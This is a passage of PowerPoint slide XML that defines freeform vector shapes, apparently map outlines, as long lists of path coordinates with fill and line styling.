                      <a:pt x="343" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="723"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="759"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="773"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="896"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="940"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="1043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="1056"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="1068"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="1075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1081"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="1081"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="1087"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="1090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="1102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="1105"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="131" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="78"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36147" name="Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3030" y="672"/>
                <a:ext cx="141" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 141"/>
                  <a:gd name="T1" fmla="*/ 80 h 135"/>
                  <a:gd name="T2" fmla="*/ 46 w 141"/>
                  <a:gd name="T3" fmla="*/ 79 h 135"/>
                  <a:gd name="T4" fmla="*/ 32 w 141"/>
                  <a:gd name="T5" fmla="*/ 79 h 135"/>
                  <a:gd name="T6" fmla="*/ 19 w 141"/>
                  <a:gd name="T7" fmla="*/ 81 h 135"/>
                  <a:gd name="T8" fmla="*/ 14 w 141"/>
                  <a:gd name="T9" fmla="*/ 84 h 135"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 71 h 135"/>
                  <a:gd name="T12" fmla="*/ 6 w 141"/>
                  <a:gd name="T13" fmla="*/ 52 h 135"/>
                  <a:gd name="T14" fmla="*/ 12 w 141"/>
                  <a:gd name="T15" fmla="*/ 45 h 135"/>
                  <a:gd name="T16" fmla="*/ 17 w 141"/>
                  <a:gd name="T17" fmla="*/ 26 h 135"/>
                  <a:gd name="T18" fmla="*/ 25 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 135"/>
                  <a:gd name="T20" fmla="*/ 35 w 141"/>
                  <a:gd name="T21" fmla="*/ 30 h 135"/>
                  <a:gd name="T22" fmla="*/ 42 w 141"/>
                  <a:gd name="T23" fmla="*/ 35 h 135"/>
                  <a:gd name="T24" fmla="*/ 50 w 141"/>
                  <a:gd name="T25" fmla="*/ 31 h 135"/>
                  <a:gd name="T26" fmla="*/ 56 w 141"/>
                  <a:gd name="T27" fmla="*/ 35 h 135"/>
                  <a:gd name="T28" fmla="*/ 61 w 141"/>
                  <a:gd name="T29" fmla="*/ 49 h 135"/>
                  <a:gd name="T30" fmla="*/ 68 w 141"/>
                  <a:gd name="T31" fmla="*/ 35 h 135"/>
                  <a:gd name="T32" fmla="*/ 71 w 141"/>
                  <a:gd name="T33" fmla="*/ 16 h 135"/>
                  <a:gd name="T34" fmla="*/ 78 w 141"/>
                  <a:gd name="T35" fmla="*/ 3 h 135"/>
                  <a:gd name="T36" fmla="*/ 75 w 141"/>
                  <a:gd name="T37" fmla="*/ 38 h 135"/>
                  <a:gd name="T38" fmla="*/ 76 w 141"/>
                  <a:gd name="T39" fmla="*/ 51 h 135"/>
                  <a:gd name="T40" fmla="*/ 82 w 141"/>
                  <a:gd name="T41" fmla="*/ 51 h 135"/>
                  <a:gd name="T42" fmla="*/ 89 w 141"/>
                  <a:gd name="T43" fmla="*/ 31 h 135"/>
                  <a:gd name="T44" fmla="*/ 97 w 141"/>
                  <a:gd name="T45" fmla="*/ 19 h 135"/>
                  <a:gd name="T46" fmla="*/ 102 w 141"/>
                  <a:gd name="T47" fmla="*/ 25 h 135"/>
                  <a:gd name="T48" fmla="*/ 106 w 141"/>
                  <a:gd name="T49" fmla="*/ 45 h 135"/>
                  <a:gd name="T50" fmla="*/ 111 w 141"/>
                  <a:gd name="T51" fmla="*/ 46 h 135"/>
                  <a:gd name="T52" fmla="*/ 126 w 141"/>
                  <a:gd name="T53" fmla="*/ 42 h 135"/>
                  <a:gd name="T54" fmla="*/ 137 w 141"/>
                  <a:gd name="T55" fmla="*/ 50 h 135"/>
                  <a:gd name="T56" fmla="*/ 141 w 141"/>
                  <a:gd name="T57" fmla="*/ 65 h 135"/>
                  <a:gd name="T58" fmla="*/ 137 w 141"/>
                  <a:gd name="T59" fmla="*/ 73 h 135"/>
                  <a:gd name="T60" fmla="*/ 123 w 141"/>
                  <a:gd name="T61" fmla="*/ 98 h 135"/>
                  <a:gd name="T62" fmla="*/ 111 w 141"/>
                  <a:gd name="T63" fmla="*/ 113 h 135"/>
                  <a:gd name="T64" fmla="*/ 103 w 141"/>
                  <a:gd name="T65" fmla="*/ 116 h 135"/>
                  <a:gd name="T66" fmla="*/ 97 w 141"/>
                  <a:gd name="T67" fmla="*/ 121 h 135"/>
                  <a:gd name="T68" fmla="*/ 87 w 141"/>
                  <a:gd name="T69" fmla="*/ 135 h 135"/>
                  <a:gd name="T70" fmla="*/ 42 w 141"/>
                  <a:gd name="T71" fmla="*/ 131 h 135"/>
                  <a:gd name="T72" fmla="*/ 42 w 141"/>
                  <a:gd name="T73" fmla="*/ 117 h 135"/>
                  <a:gd name="T74" fmla="*/ 53 w 141"/>
                  <a:gd name="T75" fmla="*/ 107 h 135"/>
                  <a:gd name="T76" fmla="*/ 58 w 141"/>
                  <a:gd name="T77" fmla="*/ 80 h 135"/>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41"/>
                  <a:gd name="T118" fmla="*/ 0 h 135"/>
                  <a:gd name="T119" fmla="*/ 141 w 141"/>
                  <a:gd name="T120" fmla="*/ 135 h 135"/>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41" h="135">
                    <a:moveTo>
                      <a:pt x="58" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="46" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="80"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36148" name="Freeform 281"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2818" y="1320"/>
                <a:ext cx="414" cy="491"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 88 w 414"/>
                  <a:gd name="T1" fmla="*/ 448 h 491"/>
                  <a:gd name="T2" fmla="*/ 85 w 414"/>
                  <a:gd name="T3" fmla="*/ 453 h 491"/>
                  <a:gd name="T4" fmla="*/ 70 w 414"/>
                  <a:gd name="T5" fmla="*/ 466 h 491"/>
                  <a:gd name="T6" fmla="*/ 46 w 414"/>
                  <a:gd name="T7" fmla="*/ 488 h 491"/>
                  <a:gd name="T8" fmla="*/ 27 w 414"/>
                  <a:gd name="T9" fmla="*/ 485 h 491"/>
                  <a:gd name="T10" fmla="*/ 8 w 414"/>
                  <a:gd name="T11" fmla="*/ 460 h 491"/>
                  <a:gd name="T12" fmla="*/ 17 w 414"/>
                  <a:gd name="T13" fmla="*/ 461 h 491"/>
                  <a:gd name="T14" fmla="*/ 17 w 414"/>
                  <a:gd name="T15" fmla="*/ 453 h 491"/>
                  <a:gd name="T16" fmla="*/ 13 w 414"/>
                  <a:gd name="T17" fmla="*/ 450 h 491"/>
                  <a:gd name="T18" fmla="*/ 6 w 414"/>
                  <a:gd name="T19" fmla="*/ 451 h 491"/>
                  <a:gd name="T20" fmla="*/ 7 w 414"/>
                  <a:gd name="T21" fmla="*/ 444 h 491"/>
                  <a:gd name="T22" fmla="*/ 19 w 414"/>
                  <a:gd name="T23" fmla="*/ 434 h 491"/>
                  <a:gd name="T24" fmla="*/ 15 w 414"/>
                  <a:gd name="T25" fmla="*/ 423 h 491"/>
                  <a:gd name="T26" fmla="*/ 8 w 414"/>
                  <a:gd name="T27" fmla="*/ 409 h 491"/>
                  <a:gd name="T28" fmla="*/ 2 w 414"/>
                  <a:gd name="T29" fmla="*/ 392 h 491"/>
                  <a:gd name="T30" fmla="*/ 10 w 414"/>
                  <a:gd name="T31" fmla="*/ 370 h 491"/>
                  <a:gd name="T32" fmla="*/ 8 w 414"/>
                  <a:gd name="T33" fmla="*/ 360 h 491"/>
                  <a:gd name="T34" fmla="*/ 26 w 414"/>
                  <a:gd name="T35" fmla="*/ 343 h 491"/>
                  <a:gd name="T36" fmla="*/ 33 w 414"/>
                  <a:gd name="T37" fmla="*/ 332 h 491"/>
                  <a:gd name="T38" fmla="*/ 58 w 414"/>
                  <a:gd name="T39" fmla="*/ 317 h 491"/>
                  <a:gd name="T40" fmla="*/ 78 w 414"/>
                  <a:gd name="T41" fmla="*/ 298 h 491"/>
                  <a:gd name="T42" fmla="*/ 102 w 414"/>
                  <a:gd name="T43" fmla="*/ 278 h 491"/>
                  <a:gd name="T44" fmla="*/ 113 w 414"/>
                  <a:gd name="T45" fmla="*/ 251 h 491"/>
                  <a:gd name="T46" fmla="*/ 123 w 414"/>
                  <a:gd name="T47" fmla="*/ 222 h 491"/>
                  <a:gd name="T48" fmla="*/ 131 w 414"/>
                  <a:gd name="T49" fmla="*/ 203 h 491"/>
                  <a:gd name="T50" fmla="*/ 139 w 414"/>
                  <a:gd name="T51" fmla="*/ 182 h 491"/>
                  <a:gd name="T52" fmla="*/ 153 w 414"/>
                  <a:gd name="T53" fmla="*/ 168 h 491"/>
                  <a:gd name="T54" fmla="*/ 168 w 414"/>
